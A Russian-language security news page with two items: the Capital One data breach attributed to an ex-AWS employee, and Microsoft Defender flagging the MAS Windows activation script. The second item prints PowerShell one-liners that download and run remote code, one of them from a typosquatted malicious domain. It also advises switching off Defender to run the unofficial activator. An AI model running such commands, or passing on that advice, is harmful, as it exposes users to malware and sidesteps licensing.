Данные 106 млн клиентов Capital One скомпрометировала экс-сотрудница AWS

Данные 106 млн клиентов Capital One скомпрометировала экс-сотрудница AWS

Данные 106 млн клиентов Capital One скомпрометировала экс-сотрудница AWS

Capital One, одна из крупнейших финансовых организаций США, подверглась кибератаке, в результате которой были скомпрометированы персональные данные более ста миллионов клиентов.

Как уже выяснили правоохранители, за атакой стоит разработчик программного обеспечения, ранее работавший в штате AWS. Минюст США обвинил 33-летнюю Пейдж Адель Томпсон, которая также известна под онлайн-псевдонимом «erratic».

На данный момент известно, что Пейдж Томпсон работала на подрядчика Capital One с 2015 по 2016 год. Киберпреступница опубликовала на GitHub детали взлома, которые дают понять, что для доступа к данным использовался неправильно сконфигурированный защитный экран уровня приложений (Web Application Firewall, WAF).

Один из пользователей GitHub, обративший внимание на пост «erratic», уведомил представителей Capital One о киберинциденте. Сотрудники финансовой организации незамедлительно приняли меры, устранив все обнаруженные лазейки.

«Важно отметить, что данные кредитных карт и учетные данные не попали в руки преступника. Среди скомпрометированной информации были имена, адреса, почтовые индексы, телефонные номера, имейлы и даты рождения», — говорится в официальном заявлении Capital One.

Microsoft Defender посчитал MAS вредоносом и заблокировал активацию Windows

Microsoft, похоже, решила всерьёз взяться за Microsoft Activation Scripts (MAS) — популярный инструмент с открытым исходным кодом для активации Windows. Компания знает, что под именем MAS в Сети давно распространяются фейковые сайты и зловредные скрипты, и начала автоматически блокировать их с помощью Microsoft Defender. Проблема в том, что под раздачу внезапно попал и настоящий MAS.

Пользователи заметили, что при попытке запустить команду активации через PowerShell система резко обрывает процесс, а Defender помечает скрипт как угрозу с детектом Trojan:PowerShell/FakeMas.DA!MTB.

Выглядит тревожно — но, судя по всему, это обычное ложноположительное срабатывание, а не целенаправленная «война» Microsoft с оригинальным проектом.

Важно понимать контекст. Совсем недавно разработчики MAS сами подтвердили, что в Сети появились поддельные сайты, распространяющие вредоносные версии скрипта. И вся разница между настоящей и фишинговой командой — в одном символе домена:

  • Оригинальный MAS:
    irm https://get.activated.win | iex
  • Вредоносная подделка:
    irm https://get.activate.win | iex
    (без буквы d)

По всей видимости, Microsoft добавила в чёрный список слишком широкий набор доменов — и вместе с фейком заблокировала легитимный адрес. Ирония ситуации в том, что антивирус может мешать безопасному скрипту, тогда как фишинговый вариант теоретически мог остаться незамеченным.

На данный момент пользователям, у которых Defender включён (а он активен по умолчанию), приходится временно отключать защиту в Центре безопасности, выполнять активацию и сразу же включать защиту обратно. Решение не самое приятное, но рабочее — при одном важном условии.

Критически важно внимательно проверять домен. Отключать защиту и запускать фишинговый скрипт — это прямой путь к заражению системы, утечке данных и другим крайне неприятным последствиям.

Скорее всего, Microsoft исправит фильтрацию в одном из ближайших обновлений сигнатур Defender.

RSS: Новости на портале Anti-Malware.ru